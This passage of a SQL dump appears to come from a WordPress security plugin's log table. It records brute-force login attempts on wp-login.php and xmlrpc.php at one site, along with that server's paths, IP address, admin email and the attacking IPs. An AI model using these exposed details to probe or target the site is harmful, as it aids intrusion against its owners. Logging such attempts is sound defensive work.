empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.163.199\";s:11:\"REMOTE_PORT\";s:5:\"45320\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHCaq1FqYKvioG46Y4wKgAAAJc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568785002.874\";s:12:\"REQUEST_TIME\";s:10:\"1568785002\";}}','notice','2019-09-18 05:36:44','2019-09-18 05:36:43',18256688,19553288,'https://bintara.com.my/xmlrpc.php',1,0,'50.63.163.199'),(24926,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"167.71.175.204\";s:11:\"REMOTE_PORT\";s:5:\"47060\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHCjCqbKGlf1IVly7OgrQAAAUc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568785036.4051\";s:12:\"REQUEST_TIME\";s:10:\"1568785036\";}}','notice','2019-09-18 05:37:18','2019-09-18 05:37:16',17741256,19231480,'https://bintara.com.my/wp-login.php',1,0,'167.71.175.204'),(24927,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"167.71.175.204\";s:11:\"REMOTE_PORT\";s:5:\"47506\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHCjyqbKGlf1IVly7OgsgAAAVQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568785039.6811\";s:12:\"REQUEST_TIME\";s:10:\"1568785039\";}}','notice','2019-09-18 05:37:21','2019-09-18 05:37:20',18256344,19553520,'https://bintara.com.my/xmlrpc.php',1,0,'167.71.175.204'),(24928,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"104.131.3.165\";s:11:\"REMOTE_PORT\";s:5:\"50154\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHEJEQGijxhVPhG1M0U3gAAABQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568785444.3705\";s:12:\"REQUEST_TIME\";s:10:\"1568785444\";}}','notice','2019-09-18 05:44:05','2019-09-18 05:44:04',17741800,19232504,'https://bintara.com.my/wp-login.php',1,0,'104.131.3.165'),(24929,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"104.131.3.165\";s:11:\"REMOTE_PORT\";s:5:\"50702\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHEJ24SfF9g@8lNlxwy5QAAAEg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568785447.5824\";s:12:\"REQUEST_TIME\";s:10:\"1568785447\";}}','notice','2019-09-18 05:44:08','2019-09-18 05:44:07',18256688,19553288,'https://bintara.com.my/xmlrpc.php',1,0,'104.131.3.165'),(24930,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"148.72.211.251\";s:11:\"REMOTE_PORT\";s:5:\"45908\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHFkiR0vdvYEIduPCLcIwAAAQM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568785810.9472\";s:12:\"REQUEST_TIME\";s:10:\"1568785810\";}}','notice','2019-09-18 05:50:12','2019-09-18 05:50:11',17741256,19231480,'https://bintara.com.my/wp-login.php',1,0,'148.72.211.251'),(24931,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"148.72.211.251\";s:11:\"REMOTE_PORT\";s:5:\"46154\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHFlK1FqYKvioG46Y4yMgAAAIM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568785812.9248\";s:12:\"REQUEST_TIME\";s:10:\"1568785812\";}}','notice','2019-09-18 05:50:14','2019-09-18 05:50:13',18256344,19553520,'https://bintara.com.my/xmlrpc.php',1,0,'148.72.211.251'),(24932,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"166.62.32.32\";s:11:\"REMOTE_PORT\";s:5:\"60364\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHF8K1FqYKvioG46Y4yagAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568785904.3701\";s:12:\"REQUEST_TIME\";s:10:\"1568785904\";}}','notice','2019-09-18 05:51:45','2019-09-18 05:51:44',17740704,19231624,'https://bintara.com.my/wp-login.php',1,0,'166.62.32.32'),(24933,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"166.62.32.32\";s:11:\"REMOTE_PORT\";s:5:\"60904\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHF861FqYKvioG46Y4yawAAAJY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1568785907.49\";s:12:\"REQUEST_TIME\";s:10:\"1568785907\";}}','notice','2019-09-18 05:51:48','2019-09-18 05:51:47',18257416,19555272,'https://bintara.com.my/xmlrpc.php',1,0,'166.62.32.32'),(24934,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 